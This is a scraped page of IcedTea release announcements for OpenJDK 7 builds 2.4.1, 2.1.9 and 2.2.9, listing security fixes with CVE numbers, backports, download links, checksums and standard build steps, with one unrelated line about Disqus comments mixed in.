sun.jvm.hotspot.debugger.bsd.BsdThread.getContext(BsdThread.java:67) S8006611: Improve scripting S8006634: Unify LWCToolkit.invokeAndWait() and sun.awt.datatransfer.ToolkitThreadBlockedHandler S8006894: G1: Number of marking threads missing from PrintFlagsFinal output S8007028: java/util/NavigableMap/LockStep hit assert(flat != TypePtr::BOTTOM) failed: cannot alias-analyze an untyped ptr S8007036: G1: Too many old regions added to last mixed GC S8007150: Event based tracing is missing truncated field in stack trace content type S8007221: G1: concurrent phase durations do not state the time units (“secs”) S8007333: [launcher] removes multiple back slashes S8007458: [findbugs] One more beans issue, with ReflectionUtils S8007699: Move some tests from test/sun/security/provider/certpath/X509CertPath to closed repo S8007703: Remove com.sun.servicetag API S8008289: DefaultButtonModel instance keeps stale listeners in html FormView S8008301: G1: guarantee(satb_mq_set.completed_buffers_num() == 0) failure S8008366: [macosx] ActionListener called twice for JMenuItem using ScreenMenuBar S8008391: Incorrect metadata for event based tracing S8008454: test/runtime/NMT/PrintNMTStatistics is broken S8008535: JDK7 Printing : CJK and Latin Text in a string overlap S8008660: Failure in 2D Queue Flusher thread on Mac S8008738: Issue in com.sun.org.apache.xml.internal.serializer.Encodings causes some JCK tests to fail intermittently S8008744: Rework part of fix for JDK-6741606 S8008804: file descriptor leak in src/windows/native/java/net/DualStackPlainSocketImpl.c S8008916: G1: Evacuation failed tracing event S8009012: [macosx] DisplayChangedListener is not implemented in LWWindowPeer/CGraphicsEnvironment S8009125: Add NMT tests for Virtual Memory operations S8009152: A number of jtreg tests need review/improvement S8009199: Printed text become garbage on Mac OSX S8009217: REGRESSION: test com/sun/org/apache/xml/internal/security/transforms/ClassLoaderTest.java fails to compile since 7u21b03 S8009259: TEST_BUG: sun/misc/Cleaner/exitOnThrow.sh failing intermittently S8009302: Mac OS X: JVM crash on infinite recursion on Appkit Thread S8009536: G1: Apache Lucene hang during reference processing S8009638: Wrong comment for PL in LocaleISOData, 1989 forward Poland is Republic of Poland S8009751: (se) Selector spin when select, close and interestOps(0) invoked at same time (lnx) S8009911: [macosx] SWT app freeze when going full screen using Java 7 on Mac S8009928: PSR:PERF Increase default string table size S8009940: G1: assert(_finger == _heap_end) failed, concurrentMark.cpp:809 S8009996: tests javax/management/mxbean/MiscTest.java and javax/management/mxbean/StandardMBeanOverrideTest.java fail S8009999: Test sun/tools/jcmd/jcmd-f.sh failing after JDK-8008820 S8010009: [macosx] Unable type into online word games on MacOSX S8010090: GC ID has the wrong type S8010118: Annotate jdk caller sensitive methods with @sun.reflect.CallerSensitive S8010151: nsk/regression/b6653214 fails “assert(snapshot != NULL) failed: Worker should not be started” S8010213: Some api/javax_net/SocketFactory tests fail in 7u25 nightly build S8010309: Improve PlatformLogger.isLoggable performance by direct mapping from an integer to Level S8010399: Test8009761.java “Failed: init recursive calls: 5498. After deopt 5494″. S8010437: guarantee(this->is8bit(imm8)) failed: Short forward jump exceeds 8-bit offset S8010463: G1: Crashes with -UseTLAB and heap verification S8010514: G1: Concurrent mode failure tracing event S8010714: XML DSig API allows a RetrievalMethod to reference another RetrievalMethod S8010721: In JDK7 the menu bar disappears when a Dialog is shown S8010727: WLS fails to add a logger with “” in its own LogManager subclass instance S8010770: Zero: back port of 8000780 to HS24 broke JSR 292 S8010780: G1: Eden occupancy/capacity output wrong after a full GC S8010913: compiler/6863420 often exceeds timeout S8010927: Kitchensink crashed with SIGSEGV, Problematic frame: v ~StubRoutines::checkcast_arraycopy S8011102: Clear AVX registers after return from JNI call S8011128: (fs) Files.createDirectory fails if the resolved path is exactly 248 characters long S8011139: (reflect) Revise checking in getEnclosingClass S8011154: java/awt/Frame/ShapeNotSetSometimes/ShapeNotSetSometimes.java failed since 7u25b03 on windows S8011161: NMT: Memory leak when encountering out of memory error while initializing memory snapshot S8011186: [TEST_BUG] java/awt/Focus/OverrideRedirectWindowActivationTest/OverrideRedirectWindowActivationTest.java failed on windows 8 S8011200: (coll) Optimize empty HashMap and ArrayList S8011218: Kitchensink hanged, likely NMT is to blame S8011313: OCSP timeout set to wrong value if com.sun.security.ocsp.timeout not defined S8011380: FX dependency on PlatformLogger broken by 8010309 S8011425: NPE in TestObjectCountAfterGCEvent.java on Linux32 S8011557: Improve reflection utility classes S8011653: Upgrade to JAXP 1.5 S8011686: [macosx] AWT accidentally disables the NSApplicationDelegate of SWT, causing loss of OS X integration functionality S8011695: [tck-red] Application can not be run, the Security Warning dialog is gray. S8011806: 7u25-b05 hotspot fastdebug build failure S8011882: Replace spin loops as back off when suspending S8011891: The vm/gc/heap/heap_summary_after_gc event for CMS contains old data S8011901: Unsafe.getAndAddLong(obj, off, delta) does not work properly with long deltas S8011947: new hotspot build – hs24-b41 S8011952: Missing ResourceMarks in TraceMethodHandles S8011968: Kitchensink crashed with SIGSEGV in MemBaseline::baseline S8011986: [corba] idlj generates read/write union helper methods that throw wrong exception in some cases S8011990: TEST_BUG: java/util/logging/bundlesearch/ResourceBundleSearchTest.java fails on Windows S8011992: java/awt/image/mlib/MlibOpsTest.java failed since jdk7u25b05 S8012004: JInternalFrame not being finalized after closing S8012019: (fc) Thread.interrupt triggers hang in FileChannelImpl.pread (win) S8012037: Test8009761.java “Failed: init recursive calls: 7224. After deopt 58824″ S8012044: Give more information about self-suppression from Throwable.addSuppressed S8012082: SASL: auth-conf negotiated, but unencrypted data is accepted, reset to unencrypt S8012086: The object count event should only send events for instances occupying more than 0.5% of the heap S8012102: CollectedHeap::ensure_parsability is not always called during heap inspection S8012112: java/awt/image/mlib/MlibOpsTest.java fails on sparc solaris S8012182: Add information about class loading and unloading to event based tracing framework S8012210: Make TracingTime available when INCLUDE_TRACE = 0 S8012212: Want to link against kstat on solaris x86 as well as sparc S8012243: about 30% regression on specjvm2008.serial on 7u25 comparing 7u21 S8012265: VM often crashes on solaris with a lot of memory S8012330: [macosx] Sometimes the applet showing the modal dialog itself loses the ability to gain focus S8012335: G1: Fix bug with compressed oops in template interpreter on x86 and sparc. S8012381: [macosx] Collation selection ignored when printing on MacOSX S8012453: (process) Runtime.exec(String) fails if command contains spaces [win] S8012455: Missing time and date stamps for PrintGCApplicationConcurrentTime and PrintGCApplicationStoppedTime S8012558: new hotspot build – hs24-b42 S8012586: [x11] Modal dialogs for fullscreen window may show behind its owner S8012617: ArrayIndexOutOfBoundsException with some fonts using LineBreakMeasurer S8012683: Remove unused, obsolete ObjectFactory classes S8012714: Assign the unique traceid directly to the Klass upon creation S8012715: G1: GraphKit accesses PtrQueue::_index as int but is size_t S8012933: Test closed/java/awt/Dialog/DialogAnotherThread/JaWSTest.java fails since jdk 7u25 b07 S8013057: assert(_needs_gc || SafepointSynchronize::is_at_safepoint()) failed: only read at safepoint S8013117: Thread-local trace_buffer has wrong type and name S8013120: NMT: Kitchensink crashes with assert(next_region == NULL || !next_region->is_committed_region()) failed: Sanity check S8013140: Heap corruption with NetworkInterface.getByInetAddress() and long i/f name S8013196: TimeZone.getDefault() throws NPE due to sun.awt.AppContext.getAppContext() S8013214: BigApps fails due to ‘fatal error: Illegal threadstate encountered: 6′ S8013226: new hotspot build – hs24-b43 S8013228: Create new system properties to control allowable OCSP clock skew and CRL connection timeout S8013370: Null pointer exception when adding more than 9 accelators to a JMenuBar S8013380: Removal of stack walk to find resource bundle breaks Glassfish startup S8013398: Adjust number of stack guard pages on systems with large memory page size S8013416: Java Bean Persistence with XMLEncoder S8013557: XMLEncoder in 1.7 can’t encode objects initialized in no argument constructor S8013651: NMT: reserve/release sequence id’s in incorrect order due to race S8013799: new hotspot build – hs24-b44 S8013810: PrintServiceLookup.lookupPrintServices() does not return consistent result S8013827: File.createTempFile hangs with temp file starting with ‘com1.4′ S8013900: More warnings compiling jaxp. S8013917: Kitchensink crashed with SIGSEGV in BaselineReporter::diff_callsites S8013934: Garbage collection event for CMS has wrong cause for System.gc() S8014048: Online user guide of jconsole points incorrect link S8014129: makefile changes to allow integration of new features S8014189: JVM crash with SEGV in ConnectionGraph::record_for_escape_analysis() S8014196: ktab creates a file with zero kt_vno S8014205: Most of the Swing dialogs are blank on one win7 MUI S8014278: new hotspot build – hs24-b45 S8014326: [OSX] All libjvm symbols are exported S8014408: G1: crashes with assert assert(prev_committed_card_num == _committed_max_card_num) failed S8014411: Decrease lock order rank for event tracing locks S8014420: Default JDP address does not match the one assigned by IANA S8014423: [macosx] The scrollbar’s block increment performs incorrectly S8014427: REGRESSION: closed/javax/imageio/plugins/bmp/Write3ByteBgrTest.java fails since 7u25 b09 S8014478: EnableTracing: output from multiple threads may be mixed together S8014611: reserve_and_align() assumptions are invalid on windows S8014669: arch specific flags not passed to some link commands S8014676: Java debugger may fail to run S8014718: Netbeans IDE begins to throw a lot exceptions since 7u25 b10 S8014721: TEST_BUG: java/awt/TrayIcon/DragEventSource/DragEventSource.java fails with java.lang.UnsupportedOperationException S8014724: Broken 7u-dev build S8014745: Provide a switch to allow stack walk search of resource bundle S8014759: new hotspot build – hs24-b46 S8014811: loopTransform.cpp assert(cmp_end->in(2) == limit) failed S8014821: Regression: Focus issues with Oracle WebCenter Capture applet S8014863: Line break calculations in Java 7 are incorrect S8014891: Redundant setting of external access properties in setFeatures S8014924: JToolTip#setTipText() sometimes (very often) not repaints component. S8014941: make jdk7u40 the default jprt release for hs24 S8014968: OCSP and CRL connection timeout is set to four hours by default S8014969: Use open man pages for non commercial builds S8015016: Improve JAXP 1.5 error message S8015275: Resolve ambiguity in OCSPChecker & CrlRevocationChecker S8015303: [macosx] Application launched via custom URL Scheme does not receive URL S8015304: new hotspot build – hs24-b47 S8015334: Memory leak when kerning is used on Windows. S8015375: Edits to text components hang for clipboard access S8015556: [macosx] surrogate pairs do not render properly. S8015604: JDP packets containing ideographic characters are broken S8015606: Text is not rendered correctly if destination buffer is custom S8015683: object_count_after_gc should have the same timestamp for all events S8015689: new hotspot build – hs24-b48 S8015972: Refactor the sending of the object count after GC event S8016046: (process) Strict validation of input should be security manager case only [win]. S8016063: getFinalAttributes should use FindClose S8016065: Write regression test for 7167142 S8016077: new hotspot build – hs24-b49 S8016153: Property http://javax.xml.XMLConstants/property/accessExternalDTD is not recognized. S8016170: GC id variable in gcTrace.cpp should use typedef GCId S8016187: assert(nbits == 32 || (-(1 << nbits-1) <= x && x < ( 1 << nbits-1))) failed: value out of range S8016556: G1: Use ArrayAllocator for BitMaps S8016566: new hotspot build – hs24-b50 S8016735: Remove superfluous EnableInvokeDynamic warning from UnlockDiagnosticVMOptions check S8016814: sun.reflect.Reflection.getCallerClass returns the frame off by 1 The tarball can be downloaded from: http://icedtea.classpath.org/download/source/icedtea-2.4.1.tar.gz SHA256 checksums: 65142e19ee14c28106345b30b6181f5a4926dd20be599c536d778e31a8a5812a icedtea-2.4.1.tar.gz The tarball is accompanied by a digital signature available at: http://icedtea.classpath.org/download/source/icedtea-2.1.9.tar.gz.sig http://icedtea.classpath.org/download/source/icedtea-2.2.9.tar.gz.sig This is produced using my public key. See details below. PGP Key: 248BDC07 (https://keys.indymedia.org/) Fingerprint = EC5A 1F5E C0AD 1D15 8F1F 8F91 3B96 A578 248B DC07 The following people helped with these releases: Andrew Hughes (synchronisation with upstream and release management) We would also like to thank the bug reporters and testers! To get started: $ tar xzf icedtea-2.4.1.tar.gz $ mkdir icedtea-build $ cd icedtea-build $ ../icedtea-2.4.1/configure $ make Full build requirements and instructions are available in the INSTALL file. Happy hacking! [Less]

I like it when visitors can leave comments, and Disqus is extremely easy to use with Pelican. It literally takes a single setting to switch on.

The IcedTea project provides a harness to build the source code from OpenJDK using Free Software build tools, along with additional features such as a PulseAudio sound driver and support for alternative virtual machines. These releases update our ... [More] OpenJDK 7 support to include the latest security updates. We recommend that users of the 2.1.x and 2.2.x branches upgrade to the latest release as soon as possible. The security fixes are as follows: S6741606, CVE-2013-2407: Integrate Apache Santuario S7158805, CVE-2013-2445: Better rewriting of nested subroutine calls S7170730, CVE-2013-2451: Improve Windows network stack support. S8000638, CVE-2013-2450: Improve deserialization S8000642, CVE-2013-2446: Better handling of objects for transportation S8001032: Restrict object access S8001033, CVE-2013-2452: Refactor network address handling in virtual machine identifiers S8001034, CVE-2013-1500: Memory management improvements S8001038, CVE-2013-2444: Resourcefully handle resources S8001043: Clarify definition restrictions S8001308: Update display of applet windows S8001309: Better handling of annotation interfaces S8001318, CVE-2013-2447: Socket.getLocalAddress not consistent with InetAddress.getLocalHost S8003703, CVE-2013-2412: Update RMI connection dialog box S8004288, CVE-2013-2449: (fs) Files.probeContentType problems S8004584: Augment applet contextualization S8005007: Better glyph processing S8006328, CVE-2013-2448: Improve robustness of sound classes S8006611: Improve scripting S8007467: Improve robustness of JMX internal APIs S8007471: Improve MBean notifications S8007812, CVE-2013-2455: (reflect) Class.getEnclosingMethod problematic for some classes S8007925: Improve cmsStageAllocLabV2ToV4curves S8007926: Improve cmsPipelineDup S8007927: Improve cmsAllocProfileSequenceDescription S8007929: Improve CurvesAlloc S8008120, CVE-2013-2457: Improve JMX class checking S8008124, CVE-2013-2453: Better compliance testing S8008128: Better API coherence for JMX S8008132, CVE-2013-2456: Better serialization support S8008585: Better JMX data handling S8008593: Better URLClassLoader resource management S8008603: Improve provision of JMX providers S8008607: Better input checking in JMX S8008611: Better handling of annotations in JMX S8008615: Improve robustness of JMX internal APIs S8008623: Better handling of MBeanServers S8008744, CVE-2013-2407: Rework part of fix for JDK-6741606 S8008982: Adjust JMX for underlying interface changes S8009004: Better implementation of RMI connections S8009008: Better manage management-api S8009013: Better handling of T2K glyphs S8009034: Improve resulting notifications in JMX S8009038: Improve JMX notification support S8009057, CVE-2013-2448: Improve MIDI event handling S8009067: Improve storing keys in KeyStore S8009071, CVE-2013-2459: Improve shape handling S8009235: Improve handling of TSA data S8009424, CVE-2013-2458: Adapt Nashorn to JSR-292 implementation change S8009554, CVE-2013-2454: Improve SerialJavaObject.getFields S8009654: Improve stability of cmsnamed S8010209, CVE-2013-2460: Better provision of factories S8011243, CVE-2013-2470: Improve ImagingLib S8011248, CVE-2013-2471: Better Component Rasters S8011253, CVE-2013-2472: Better Short Component Rasters S8011257, CVE-2013-2473: Better Byte Component Rasters S8012375, CVE-2013-1571: Improve Javadoc framing S8012421: Better positioning of PairPositioning S8012438, CVE-2013-2463: Better image validation S8012597, CVE-2013-2465: Better image channel verification S8012601, CVE-2013-2469: Better validation of image layouts S8014281, CVE-2013-2461: Better checking of XML signature S8015997: Additional improvement in Javadoc framing S8001330 is currently only provided for HotSpot 23.7 on 2.3.x, as we’ve found it to be unstable when applied to the older HotSpots. If we find a solution for this, we’ll issue a further update. This will be the last set of updates for the 2.1.x and 2.2.x branches. Users should upgrade to either 2.3.10 or the upcoming 2.4.1 release. Those users who need ARM32 JIT support should wait for the 2.3.11 release, coming in the next few months, which will add this to the 2.3.x series. IcedTea includes the usual IcedTea patches to allow builds against system libraries and to support more esoteric architectures. In this release, use of the system version of LCMS is disabled by default to ensure the most secure version is used. Before using the system version, please ensure it has the S8007925, S8007926, S8007927, S8007929 and S8009654 updates listed above. If you find an issue with the release, please report it to our bug database under the appropriate component. Development discussion takes place on the distro-pkg-dev OpenJDK mailing list and patches are always welcome. Full details of the release can be found below. Note that the unusually large number of backports is due to backporting from the upstream u25 release, which also provides all these. What’s New? New in release 2.1.9 (2013-06-29) New features PR1378: Add AArch64 support to Zero Security fixes S6741606, CVE-2013-2407: Integrate Apache Santuario S7158805, CVE-2013-2445: Better rewriting of nested subroutine calls S7170730, CVE-2013-2451: Improve Windows network stack support. S8000638, CVE-2013-2450: Improve deserialization S8000642, CVE-2013-2446: Better handling of objects for transportation S8001032: Restrict object access S8001033, CVE-2013-2452: Refactor network address handling in virtual machine identifiers S8001034, CVE-2013-1500: Memory management improvements S8001038, CVE-2013-2444: Resourcefully handle resources S8001043: Clarify definition restrictions S8001308: Update display of applet windows S8001309: Better handling of annotation interfaces S8001318, CVE-2013-2447: Socket.getLocalAddress not consistent with InetAddress.getLocalHost S8003703, CVE-2013-2412: Update RMI connection dialog box S8004288, CVE-2013-2449: (fs) Files.probeContentType problems S8004584: Augment applet contextualization S8005007: Better glyph processing S8006328, CVE-2013-2448: Improve robustness of sound classes S8006611: Improve scripting S8007467: Improve robustness of JMX internal APIs S8007471: Improve MBean notifications S8007812, CVE-2013-2455: (reflect) Class.getEnclosingMethod problematic for some classes S8007925: Improve cmsStageAllocLabV2ToV4curves S8007926: Improve cmsPipelineDup S8007927: Improve cmsAllocProfileSequenceDescription S8007929: Improve CurvesAlloc S8008120, CVE-2013-2457: Improve JMX class checking S8008124, CVE-2013-2453: Better compliance testing S8008128: Better API coherence for JMX S8008132, CVE-2013-2456: Better serialization support S8008585: Better JMX data handling S8008593: Better URLClassLoader resource management S8008603: Improve provision of JMX providers S8008607: Better input checking in JMX S8008611: Better handling of annotations in JMX S8008615: Improve robustness of JMX internal APIs S8008623: Better handling of MBeanServers S8008744, CVE-2013-2407: Rework part of fix for JDK-6741606 S8008982: Adjust JMX for underlying interface changes S8009004: Better implementation of RMI connections S8009008: Better manage management-api S8009013: Better handling of T2K glyphs S8009034: Improve resulting notifications in JMX S8009038: Improve JMX notification support S8009057, CVE-2013-2448: Improve MIDI event handling S8009067: Improve storing keys in KeyStore S8009071, CVE-2013-2459: Improve shape handling S8009235: Improve handling of TSA data S8009424, CVE-2013-2458: Adapt Nashorn to JSR-292 implementation change S8009554, CVE-2013-2454: Improve SerialJavaObject.getFields S8009654: Improve stability of cmsnamed S8010209, CVE-2013-2460: Better provision of factories S8011243, CVE-2013-2470: Improve ImagingLib S8011248, CVE-2013-2471: Better Component Rasters S8011253, CVE-2013-2472: Better Short Component Rasters S8011257, CVE-2013-2473: Better Byte Component Rasters S8012375, CVE-2013-1571: Improve Javadoc framing S8012421: Better positioning of PairPositioning S8012438, CVE-2013-2463: Better image validation S8012597, CVE-2013-2465: Better image channel verification S8012601, CVE-2013-2469: Better validation of image layouts S8014281, CVE-2013-2461: Better checking of XML signature S8015997: Additional improvement in Javadoc framing Backports S7171223, RH967436: Building ExtensionSubtables.cpp should use -fno-strict-aliasing S7053526: Upgrade JDK 8 to use Little CMS 2.4 S7077803: java.lang.InternalError in java.lang.invoke.MethodHandleNatives.init S7124347: [macosx] java.lang.InternalError: not implemented yet on call Graphics2D.drawRenderedImage S7142596: RMI JPRT tests are failing S7151434, RH969884: java -jar -XX crashes java launcher S7158483: (tz) Support tzdata2012c S7188114: (launcher) need an alternate command line parser for Windows S7195301: XML Signature DOM implementation should not use instanceof to determine type of Node S7198570: (tz) Support tzdata2012f S7199143: RFE: OCSP revocation checker should provide possibility to specify connection timeout S8002070: Remove the stack search for a resource bundle for Logger to use S8002225: (tz) Support tzdata2012i S8006120: Provide “Server JRE” for 7u train S8006536: [launcher] removes trailing slashes on arguments S8009165: Fix for 8006435 needs revision S8009217: REGRESSION: test com/sun/org/apache/xml/internal/security/transforms/ClassLoaderTest.java fails to compile since 7u21b03 S8009463: Regression test test\java\lang\Runtime\exec\ArgWithSpaceAndFinalBackslash.java failing. S8009610: Blacklist certificate used with malware. S8009987: (tz) Support tzdata2013b S8009996: tests javax/management/mxbean/MiscTest.java and javax/management/mxbean/StandardMBeanOverrideTest.java fail S8010118: Annotate jdk caller sensitive methods with @sun.reflect.CallerSensitive S8010213: Some api/javax_net/SocketFactory tests fail in 7u25 nightly build S8010714: XML DSig API allows a RetrievalMethod to reference another RetrievalMethod S8010727: WLS fails to add a logger with “” in its own LogManager subclass instance S8010939: Deadlock in LogManager S8011139: (reflect) Revise checking in getEnclosingClass S8011154: java/awt/Frame/ShapeNotSetSometimes/ShapeNotSetSometimes.java failed since 7u25b03 on windows S8011313: OCSP timeout set to wrong value if com.sun.security.ocsp.timeout not defined S8011557: Improve reflection utility classes S8011806: 7u25-b05 hotspot fastdebug build failure S8011990: TEST_BUG: java/util/logging/bundlesearch/ResourceBundleSearchTest.java fails on Windows S8011992: java/awt/image/mlib/MlibOpsTest.java failed since jdk7u25b05 S8012112: java/awt/image/mlib/MlibOpsTest.java fails on sparc solaris S8012243: about 30% regression on specjvm2008.serial on 7u25 comparing 7u21 S8012453: (process) Runtime.exec(String) fails if command contains spaces [win] S8012617: ArrayIndexOutOfBoundsException with some fonts using LineBreakMeasurer S8012933: Test closed/java/awt/Dialog/DialogAnotherThread/JaWSTest.java fails since jdk 7u25 b07 S8013196: TimeZone.getDefault() throws NPE due to sun.awt.AppContext.getAppContext() S8013228: Create new system properties to control allowable OCSP clock skew and CRL connection timeout S8013380: Removal of stack walk to find resource bundle breaks Glassfish startup S8014205: Most of the Swing dialogs are blank on one win7 MUI S8014427: REGRESSION: closed/javax/imageio/plugins/bmp/Write3ByteBgrTest.java fails since 7u25 b09 S8014618, RH962568: Need to strip leading zeros in TlsPremasterSecret of DHKeyAgreement S8014676: Java debugger may fail to run S8014718: Netbeans IDE begins to throw a lot exceptions since 7u25 b10 S8014745: Provide a switch to allow stack walk search of resource bundle S8014968: OCSP and CRL connection timeout is set to four hours by default Bug fixes PR1095, PR1409: Allow -Werror to be turned off (HotSpot repository only). PR1188: ASM Interpreter and Thumb2 JIT javac miscompile modulo reminder on armel New in release 2.2.9 (2013-06-29) New features PR1378: Add AArch64 support to Zero Security fixes S6741606, CVE-2013-2407: Integrate Apache Santuario S7158805, CVE-2013-2445: Better rewriting of nested subroutine calls S7170730, CVE-2013-2451: Improve Windows network stack support. S8000638, CVE-2013-2450: Improve deserialization S8000642, CVE-2013-2446: Better handling of objects for transportation S8001032: Restrict object access S8001033, CVE-2013-2452: Refactor network address handling in virtual machine identifiers S8001034, CVE-2013-1500: Memory management improvements S8001038, CVE-2013-2444: Resourcefully handle resources S8001043: Clarify definition restrictions S8001308: Update display of applet windows S8001309: Better handling of annotation interfaces S8001318, CVE-2013-2447: Socket.getLocalAddress not consistent with InetAddress.getLocalHost S8003703, CVE-2013-2412: Update RMI connection dialog box S8004288, CVE-2013-2449: (fs) Files.probeContentType problems S8004584: Augment applet contextualization S8005007: Better glyph processing S8006328, CVE-2013-2448: Improve robustness of sound classes S8006611: Improve scripting S8007467: Improve robustness of JMX internal APIs S8007471: Improve MBean notifications S8007812, CVE-2013-2455: (reflect) Class.getEnclosingMethod problematic for some classes S8007925: Improve cmsStageAllocLabV2ToV4curves S8007926: Improve cmsPipelineDup S8007927: Improve cmsAllocProfileSequenceDescription S8007929: Improve CurvesAlloc S8008120, CVE-2013-2457: Improve JMX class checking S8008124, CVE-2013-2453: Better compliance testing S8008128: Better API coherence for JMX S8008132, CVE-2013-2456: Better serialization support S8008585: Better JMX data handling S8008593: Better URLClassLoader resource management S8008603: Improve provision of JMX providers S8008607: Better input checking in JMX S8008611: Better handling of annotations in JMX S8008615: Improve robustness of JMX internal APIs S8008623: Better handling of MBeanServers S8008744, CVE-2013-2407: Rework part of fix for JDK-6741606 S8008982: Adjust JMX for underlying interface changes S8009004: Better implementation of RMI connections S8009008: Better manage management-api S8009013: Better handling of T2K glyphs S8009034: Improve resulting notifications in JMX S8009038: Improve JMX notification support S8009057, CVE-2013-2448: Improve MIDI event handling S8009067: Improve storing keys in KeyStore S8009071, CVE-2013-2459: Improve shape handling S8009235: Improve handling of TSA data S8009424, CVE-2013-2458: Adapt Nashorn to JSR-292 implementation change S8009554, CVE-2013-2454: Improve SerialJavaObject.getFields S8009654: Improve stability of cmsnamed S8010209, CVE-2013-2460: Better provision of factories S8011243, CVE-2013-2470: Improve ImagingLib S8011248, CVE-2013-2471: Better Component Rasters S8011253, CVE-2013-2472: Better Short Component Rasters S8011257, CVE-2013-2473: Better Byte Component Rasters S8012375, CVE-2013-1571: Improve Javadoc framing S8012421: Better positioning of PairPositioning S8012438, CVE-2013-2463: Better image validation S8012597, CVE-2013-2465: Better image channel verification S8012601, CVE-2013-2469: Better validation of image layouts S8014281, CVE-2013-2461: Better checking of XML signature S8015997: Additional improvement in Javadoc framing Backports S7053526: Upgrade JDK 8 to use Little CMS 2.4 S7124347: [macosx] java.lang.InternalError: not implemented yet on call Graphics2D.drawRenderedImage S7142091: [macosx] RFE: Refactoring of peer initialization/disposing S7142596: RMI JPRT tests are failing S7150345: [macosx] Can’t type into applets S7151434, RH969884: java -jar -XX crashes java launcher S7156191: [macosx] Can’t type into applet demos in Pivot S7156194: [macosx] Can’t type non-ASCII characters into applets S7171223: Building ExtensionSubtables.cpp should use -fno-strict-aliasing S7174718: [macosx] Regression in 7u6 b12: PopupFactory leaks DefaultFrames. S7188114: (launcher) need an alternate command line parser for Windows S7195301: XML Signature DOM implementation should not use instanceof to determine type of Node S7198570: (tz) Support tzdata2012f S7199143: RFE: OCSP revocation checker should provide possibility to specify connection timeout S8001161: mac: EmbeddedFrame doesn’t become active window S8002070: Remove the stack search for a resource bundle for Logger to use S8002225: (tz) Support tzdata2012i S8005932: Java 7 on mac os x only provides text clipboard formats S8006120: Provide “Server JRE” for 7u train S8006417: JComboBox.showPopup(), hidePopup() fails in JRE 1.7 on OS X S8006536: [launcher] removes trailing slashes on arguments S8009165: Fix for 8006435 needs revision S8009217: REGRESSION: test com/sun/org/apache/xml/internal/security/transforms/ClassLoaderTest.java fails to compile since 7u21b03 S8009463: Regression test test\java\lang\Runtime\exec\ArgWithSpaceAndFinalBackslash.java failing. S8009610: Blacklist certificate used with malware. S8009987: (tz) Support tzdata2013b S8009996: tests javax/management/mxbean/MiscTest.java and javax/management/mxbean/StandardMBeanOverrideTest.java fail S8010009: [macosx] Unable type into online word games on MacOSX S8010118: Annotate jdk caller sensitive methods with @sun.reflect.CallerSensitive S8010213: Some api/javax_net/SocketFactory tests fail in 7u25 nightly build S8010714: XML DSig API allows a RetrievalMethod to reference another RetrievalMethod S8010727: WLS fails to add a logger with “” in its own LogManager subclass instance S8010939: Deadlock in LogManager S8011139: (reflect) Revise checking in getEnclosingClass S8011154: java/awt/Frame/ShapeNotSetSometimes/ShapeNotSetSometimes.java failed since 7u25b03 on windows S8011313: OCSP timeout set to wrong value if com.sun.security.ocsp.timeout not defined S8011557: Improve reflection utility classes S8011806: 7u25-b05 hotspot fastdebug build failure S8011990: TEST_BUG: java/util/logging/bundlesearch/ResourceBundleSearchTest.java fails on Windows S8011992: java/awt/image/mlib/MlibOpsTest.java failed since jdk7u25b05 S8012112: java/awt/image/mlib/MlibOpsTest.java fails on sparc solaris S8012243: about 30% regression on specjvm2008.serial on 7u25 comparing 7u21 S8012330: [macosx] Sometimes the applet showing the modal dialog itself loses the ability to gain focus S8012453: (process) Runtime.exec(String) fails if command contains spaces [win] S8012617: ArrayIndexOutOfBoundsException with some fonts using LineBreakMeasurer S8012933: Test closed/java/awt/Dialog/DialogAnotherThread/JaWSTest.java fails since jdk 7u25 b07 S8013196: TimeZone.getDefault() throws NPE due to sun.awt.AppContext.getAppContext() S8013228: Create new system properties to control allowable OCSP clock skew and CRL connection timeout S8013380: Removal of stack walk to find resource bundle breaks Glassfish startup S8014205: Most of the Swing dialogs are blank on one win7 MUI S8014423: [macosx] The scrollbar’s block increment performs incorrectly S8014427: REGRESSION: closed/javax/imageio/plugins/bmp/Write3ByteBgrTest.java fails since 7u25 b09 S8014618, RH962568: Need to strip leading zeros in TlsPremasterSecret of DHKeyAgreement S8014676: Java debugger may fail to run S8014718: Netbeans IDE begins to throw a lot exceptions since 7u25 b10 S8014745: Provide a switch to allow stack walk search of resource bundle S8014968: OCSP and CRL connection timeout is set to four hours by default The tarballs can be downloaded from: http://icedtea.classpath.org/download/source/icedtea-2.1.9.tar.gz http://icedtea.classpath.org/download/source/icedtea-2.2.9.tar.gz SHA256 checksums: 978bd734103ac3a81476d31801ff9ddc007b4b30bccf13ce83af5f4a5e17604d icedtea-2.1.9.tar.gz e56dbcc3fe783535881aca893ce5cd20e73d9c0f159811b98233042843af756a icedtea-2.2.9.tar.gz The tarballs are accompanied by a digital signature available at: http://icedtea.classpath.org/download/source/icedtea-2.1.9.tar.gz.sig http://icedtea.classpath.org/download/source/icedtea-2.2.9.tar.gz.sig respectively. This is produced using my public key. See details below. PGP Key: 248BDC07 (https://keys.indymedia.org/) Fingerprint = EC5A 1F5E C0AD 1D15 8F1F 8F91 3B96 A578 248B DC07 The following people helped with these releases: Andreas Schwab (PR1378 patch for AArch64 Zero support Andrew Hughes (all other bug fixes, application of security fixes & backports, release management) Xerxes Rånby (PR1188 ARM fix for 2.1.9) We would also like to thank the bug reporters and testers! To get started: $ tar xzf icedtea-${ver}.tar.gz $ mkdir icedtea-build $ cd icedtea-build $ ../icedtea-${ver}/configure $ make where ${ver} is the version used. Full build requirements and instructions are available in the INSTALL file. Happy hacking! [Less]